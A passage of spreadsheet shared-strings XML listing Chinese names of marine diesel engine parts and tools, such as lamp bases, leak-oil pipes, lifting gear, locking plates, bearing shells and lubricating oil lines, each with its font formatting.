        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯座及电缆槽布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯座和电缆槽焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯座焊接块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯座焊接快</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯接线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集水器组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油集油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放油收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油出油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏收集</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油收集</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗系统管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄油集油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座较平</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杠杆臂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手扳葫芦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套吊具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀吊具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动泵滚轮提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装和拆卸齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆安装吊具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升装置上部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴起吊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖缸起吊工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电灯泡</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轻型弹性定位销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>照明布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>极限规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸衬</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左机侧楔块衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右机侧楔块衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧楔块衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泡沫材料里衬</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>唇形密封圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液态密封胶规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液态锁固胶规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零件清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰清单</t>
    </r>
  </si>
  <si>
    <r>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准仪表清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁控制箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>E25</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧楔块衬垫锁紧板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧填料函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧钢丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用锁紧板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形锁紧板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压三位分流球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下半轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承下半段</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下端盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫圈下半段</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮下半段</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部连杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台扫气侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台燃油侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部二半环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下弹簧座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底舱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑和冷却油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑和冷却油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油和冷却油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油下油箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统清洗说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮啮合用润滑剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油排油柜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油注油枪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油注油枪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器传动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承下轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦下瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦下半部分</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦上瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦上半部分</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函排放总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
